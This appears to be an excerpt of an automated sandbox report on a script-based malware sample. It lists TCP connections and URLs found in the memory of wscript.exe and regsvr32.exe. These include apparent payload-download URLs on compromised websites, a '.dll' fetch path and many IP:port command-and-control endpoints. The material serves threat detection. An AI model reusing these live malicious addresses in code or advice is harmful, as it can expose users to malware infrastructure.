                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.155.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.155.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.168.155.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 163.44.196.120
                    Source: unknownTCP traffic detected without corresponding DNS query: 163.44.196.120
                    Source: unknownTCP traffic detected without corresponding DNS query: 163.44.196.120
                    Source: unknownTCP traffic detected without corresponding DNS query: 160.16.142.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 160.16.142.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 160.16.142.56
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
                    Source: wscript.exe, 00000001.00000003.410855988.00000000059DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420955265.00000000059DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412126322.00000000059DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413424725.00000000059DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391922304.00000000059DC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.471546520.0000000001313000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577252233.0000000001313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: regsvr32.exe, 00000004.00000003.471546520.000000000135C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.470421836.000000000136F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.469695622.000000000136E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577252233.000000000135C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                    Source: regsvr32.exe, 00000004.00000003.471546520.000000000135C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577252233.000000000135C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Low
                    Source: regsvr32.exe, 00000004.00000003.470421836.000000000136F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.469695622.000000000136E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/f
                    Source: regsvr32.exe, 00000004.00000002.886694503.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577372470.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.472062790.00000000012E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: regsvr32.exe, 00000004.00000003.577252233.0000000001313000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: regsvr32.exe, 00000004.00000003.471546520.0000000001313000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.469695622.000000000136E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?039c8a783bb8b
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                    Source: wscript.exe, 00000001.00000003.408710769.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408476560.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420641368.00000000058D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412030657.00000000058D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409457535.00000000058D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409669464.00000000058D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.co
                    Source: wscript.exe, wscript.exe, 00000001.00000003.391922304.0000000005992000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407332716.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406516474.0000000005718000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406615479.0000000005765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.000000000552C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399039460.0000000005547000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408710769.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000566B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408476560.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404823055.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413070673.0000000005817000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.419988118.0000000005581000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409633319.000000000590F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396283294.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401845274.00000000055E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.00000000054F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395825240.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396708217.0000000005501000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410529992.000000000599A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/
                    Source: wscript.exe, 00000001.00000003.411335660.0000000005141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/xM
                    Source: wscript.exe, 00000001.00000002.420528269.0000000005747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxW
                    Source: wscript.exe, 00000001.00000002.419338760.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401711047.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK
                    Source: wscript.exe, wscript.exe, 00000001.00000003.391922304.0000000005992000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407332716.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406516474.0000000005718000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406615479.0000000005765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.000000000552C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399039460.0000000005547000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408710769.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000566B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408476560.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404823055.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413070673.0000000005817000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.419988118.0000000005581000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409633319.000000000590F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396283294.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401845274.00000000055E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.00000000054F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395825240.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396708217.0000000005501000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410529992.000000000599A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
                    Source: wscript.exe, 00000001.00000003.411335660.0000000005141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
                    Source: wscript.exe, 00000001.00000003.400015710.0000000005635000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398615409.00000000055C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399066301.00000000055D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401946779.0000000005685000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397946549.00000000055A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405536940.00000000056C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406263704.00000000056CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420508641.00000000056CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/z
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                    Source: wscript.exe, 00000001.00000003.412417949.0000000005749000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420539950.000000000574A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/Gd
                    Source: wscript.exe, wscript.exe, 00000001.00000003.391922304.0000000005992000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407332716.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406516474.0000000005718000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406615479.0000000005765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.000000000552C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399039460.0000000005547000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408710769.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420756352.0000000005963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000566B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408476560.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404823055.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413070673.0000000005817000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.419988118.0000000005581000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409633319.000000000590F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396283294.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401845274.00000000055E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.00000000054F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395825240.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396708217.0000000005501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
                    Source: wscript.exe, 00000001.00000003.411335660.000000000513C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0
                    Source: wscript.exe, 00000001.00000003.411335660.0000000005141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
                    Source: regsvr32.exe, 00000004.00000002.887361819.00000000034E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://10.207.28.33:8080/
                    Source: regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.43.75.120/ncju/qfgtbvn/
                    Source: regsvr32.exe, 00000004.00000002.886694503.00000000012FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.43.75.120:443/ncju/qfgtbvn/
                    Source: regsvr32.exe, 00000004.00000002.886694503.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.168.155.143:8080/ncju/qfgtbvn/
                    Source: regsvr32.exe, 00000004.00000002.886694503.000000000135C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://107.170.39.149:8080/4
                    Source: regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/ncju/qfgtbvn/
                    Source: regsvr32.exe, 00000004.00000002.886694503.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577372470.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577252233.0000000001313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/
                    Source: regsvr32.exe, 00000004.00000003.577372470.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577252233.0000000001313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://164.90.222.65/ncju/qfgtbvn/
                    Source: regsvr32.exe, 00000004.00000002.886694503.000000000135C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://169.57.156.166:8080/ncju/qfgtbvn/ConnectionCache-Control
                    Source: regsvr32.exe, 00000004.00000002.886694503.000000000135C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://184.168.155.143:8080/
                    Source: regsvr32.exe, 00000004.00000002.887130157.000000000334E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://186.194.240.217/ncju/qfgtbvn//Nk7
                    Source: regsvr32.exe, 00000004.00000003.577372470.00000000012E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.172.199.165:8080/
                    Source: regsvr32.exe, 00000004.00000002.886694503.00000000012FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://206.189.28.199:8080/ncju/qfgtbvn/
                    Source: regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577252233.0000000001313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/
                    Source: regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577252233.0000000001313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080//
                    Source: regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577252233.0000000001313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/3
                    Source: regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.577252233.0000000001313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://66.228.32.31:7080/K
                    Source: regsvr32.exe, 00000004.00000003.577252233.0000000001302000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.886694503.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662.162.143.56/
                    Source: regsvr32.exe, 00000004.00000002.886694503.0000000001376000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://72.15.201.15:8080/ncju/qfgtbvn/
                    Source: regsvr32.exe, 00000004.00000002.886694503.00000000012FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://82.223.21.224:8080/ncju/qfgtbvn/
                    Source: regsvr32.exe, 00000004.00000002.887361819.00000000034E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://826.189.28.199:8080/
                    Source: regsvr32.exe, 00000004.00000002.886622640.0000000001288000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/
                    Source: regsvr32.exe, 00000004.00000002.886622640.0000000001288000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.886694503.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/ncju/qfgtbvn/
                    Source: regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.207.28.33:8080/
                    Source: regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.207.28.33:8080/ebx
                    Source: regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.207.28.33:8080/mbp
                    Source: regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.207.28.33:8080/ncju/qfgtbvn/
                    Source: regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.207.28.33:8080/ncju/qfgtbvn/B
                    Source: regsvr32.exe, 00000004.00000002.886694503.0000000001312000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.207.28.33:8080/ncju/qfgtbvn/G
                    Source: regsvr32.exe, 00000004.00000002.886694503.00000000012FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.207.28.33:8080/ncju/qfgtbvn/Ih
                    Source: regsvr32.exe, 00000004.00000002.886694503.00000000012E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.207.28.33:8080/ncju/qfgtbvn/Pj?
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.aadrm.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.aadrm.com/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.cortana.ai
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.diagnostics.office.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.office.net
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.onedrive.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://api.scheduler.
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://apis.live.net/v5.0/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://augloop.office.com
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://augloop.office.com/v2
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                    Source: wscript.exe, 00000001.00000003.408710769.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408476560.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420641368.00000000058D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412030657.00000000058D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409457535.00000000058D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409669464.00000000058D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.co0
                    Source: wscript.exe, 00000001.00000002.420756352.0000000005963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410172116.0000000005963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6H
                    Source: wscript.exe, wscript.exe, 00000001.00000003.391922304.0000000005992000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407332716.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406516474.0000000005718000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406615479.0000000005765000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.000000000552C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399039460.0000000005547000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408710769.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000566B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408476560.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405922290.000000000567E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404823055.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413070673.0000000005817000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391922304.00000000059CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.419988118.0000000005581000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413424725.00000000059D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412574414.0000000005145000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409633319.000000000590F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396283294.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401845274.00000000055E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.00000000054F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
                    Source: wscript.exe, 00000001.00000003.408710769.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408476560.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409314654.00000000058D9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410102687.00000000058FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409380578.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409564770.00000000058EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dll
                    Source: wscript.exe, 00000001.00000003.411335660.0000000005141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://cdn.entity.
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://cdn.hubblecontent.osi.office.net/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://clients.config.office.net/
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
